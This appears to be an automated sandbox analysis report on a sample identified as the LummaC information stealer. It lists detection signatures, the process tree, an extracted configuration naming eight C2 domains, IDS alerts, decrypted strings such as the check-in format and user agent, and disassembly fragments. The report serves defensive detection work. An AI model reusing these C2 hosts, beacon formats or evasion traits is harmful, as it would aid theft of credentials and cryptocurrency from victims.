Edit tour

Windows Analysis Report
sqJIHyPqhr.exe

Overview

General Information

Sample name:	sqJIHyPqhr.exe renamed because original name is a hash value
Original sample name:	fc0ff134aa4c7a6c02f3d502eb17a1d4.exe
Analysis ID:	1577877
MD5:	fc0ff134aa4c7a6c02f3d502eb17a1d4
SHA1:	c8a08842839e36ddc3811f3c3f78951dda942c43
SHA256:	ede8801434d59328105f4af419b459a3c5d6c60195cbe8c718bbc529607ddc61
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

sqJIHyPqhr.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\sqJIHyPqhr.exe" MD5: FC0FF134AA4C7A6C02F3D502EB17A1D4)

E093.tmp.exe (PID: 6636 cmdline: "C:\Users\user\AppData\Local\Temp\E093.tmp.exe" MD5: 9026F04B1266851659FB62C91BD7F2F3)

WerFault.exe (PID: 1328 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1428:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1080:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T20:55:46.337579+0100	2028371	3	Unknown Traffic	192.168.2.12	49712	172.67.220.223	443	TCP
2024-12-18T20:55:48.594984+0100	2028371	3	Unknown Traffic	192.168.2.12	49715	172.67.220.223	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T20:55:47.533720+0100	2054653	1	A Network Trojan was detected	192.168.2.12	49712	172.67.220.223	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T20:55:47.533720+0100	2049836	1	A Network Trojan was detected	192.168.2.12	49712	172.67.220.223	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (rapeflowwj .lat in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T20:55:46.337579+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.12	49712	172.67.220.223	443	TCP
2024-12-18T20:55:48.594984+0100	2058375	1	Domain Observed Used for C2 Detected	192.168.2.12	49715	172.67.220.223	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T20:55:44.631941+0100	2058374	1	Domain Observed Used for C2 Detected	192.168.2.12	51216	1.1.1.1	53	UDP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T20:55:39.186687+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49710	172.67.179.207	443	TCP
2024-12-18T20:55:40.836777+0100	2803274	2	Potentially Bad Traffic	192.168.2.12	49711	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://rapeflowwj.lat/6	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/apiN	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/apip	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/Y	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/apis	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEf6	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/api1	Avira URL Cloud: Label: malware
Source: https://rapeflowwj.lat/api	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1312567

Found malware configuration

Source: 4.2.E093.tmp.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["grannyejh.lat", "aspecteirs.lat", "necklacebudi.lat", "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	ReversingLabs: Detection: 68%

Multi AV Scanner detection for submitted file

Source: sqJIHyPqhr.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZRZDXR93\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: sqJIHyPqhr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: rapeflowwj.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: crosshuaht.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: sustainskelet.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: aspecteirs.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: energyaffai.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: necklacebudi.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: discokeyus.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: grannyejh.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: rapeflowwj.lat
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Screen Resoluton:
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: Workgroup: -
Source: 00000004.00000002.2678618315.0000000000400000.00000040.00000001.01000000.00000006.sdmp	String decryptor: 4h5VfH--

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Unpacked PE file: 0.2.sqJIHyPqhr.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Unpacked PE file: 4.2.E093.tmp.exe.400000.0.unpack

Source: sqJIHyPqhr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.12:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.220.223:443 -> 192.168.2.12:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\sqJIHyPqhr.exe	Code function: 0_2_024D8C59 FindFirstFileExW,		0_2_024D8C59

Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	4_2_0043C767
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp eax	4_2_0042984F
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	4_2_00423860
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov edx, ecx	4_2_00438810
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	4_2_00438810
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	4_2_00438810
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then test eax, eax	4_2_00438810
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	4_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	4_2_0041682D
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ecx], bp	4_2_0041D83A
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push C0BFD6CCh	4_2_00423086
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push C0BFD6CCh	4_2_00423086
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	4_2_0042B170
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	4_2_004179C1
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	4_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_0043B1D0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	4_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	4_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_00405990
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebp, eax	4_2_00405990
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, esi	4_2_00422190
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	4_2_00422190
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	4_2_00422190
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0042CA49
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_0042DA53
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	4_2_00416263
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	4_2_00415220
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push esi	4_2_00427AD3
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0042CAD0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	4_2_0041B2E0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push ebx	4_2_0043CA93
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	4_2_0041CB40
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00428B61
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0042CB11
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	4_2_0042CB22
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	4_2_0043F330
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, eax	4_2_0040DBD9
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	4_2_00417380
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	4_2_0041D380
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp al, 2Eh	4_2_00426B95
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00435450
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	4_2_00417380
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push 00000000h	4_2_00429C2B
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	4_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	4_2_004291DD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_004074F0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_004074F0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	4_2_0043ECA0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	4_2_004385E0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp eax	4_2_004385E0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	4_2_00417DEE
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_00409580
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	4_2_00409580
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	4_2_00418591
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	4_2_00428D93
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then xor edi, edi	4_2_0041759F
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	4_2_0041C653
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov edx, ebp	4_2_00425E70
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	4_2_00425E30
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_0043AEC0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	4_2_00408F50
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	4_2_00408F50
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_0042A700
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	4_2_0040B70C
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_0041BF14
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	4_2_00419F30
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	4_2_0041E7C0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	4_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [edi], dx	4_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	4_2_004197C2
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, ebx	4_2_0042DFE9
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp ecx	4_2_0040BFFD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov esi, eax	4_2_00415799
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_00415799
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	4_2_0043EFB0
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov edx, ebp	4_2_009160D7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	4_2_00914031
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	4_2_00908055
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	4_2_0090A197
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	4_2_008F91B7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	4_2_008F91B7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_0092B127
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_0090C17B
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then push C0BFD6CCh	4_2_009132ED
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	4_2_0092F217
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0090D230
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	4_2_0090D230
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, ebx	4_2_0091E250
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp ecx	4_2_008FC264
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	4_2_0091B3D7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, esi	4_2_009123F7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ebx], cx	4_2_009123F7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	4_2_009123F7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	4_2_00905487
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	4_2_009164DA
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	4_2_009064CA
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ecx], dx	4_2_00919444
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	4_2_00919444
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	4_2_0092F597
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	4_2_009075E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	4_2_0090D5E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	4_2_0090B547
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_009256B7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ecx, eax	4_2_008F97E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	4_2_008F97E7
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_008F7757
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_008F7757
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	4_2_0090C8BA
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	4_2_0092887B
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp eax	4_2_0092898E
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	4_2_0092C9CE
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_0091A967
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	4_2_008FB973
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then jmp eax	4_2_00919AB5
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [ecx], bp	4_2_0090DAB8
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+6D2CC012h]	4_2_00904ACD
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	4_2_0090EA27
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	4_2_00909A29
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [edi], dx	4_2_00909A29
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov word ptr [esi], cx	4_2_00909A29
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then mov edx, ecx	4_2_00928A77
Source: C:\Users\user\AppData\Local\Temp\E093.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	4_2_00928A77
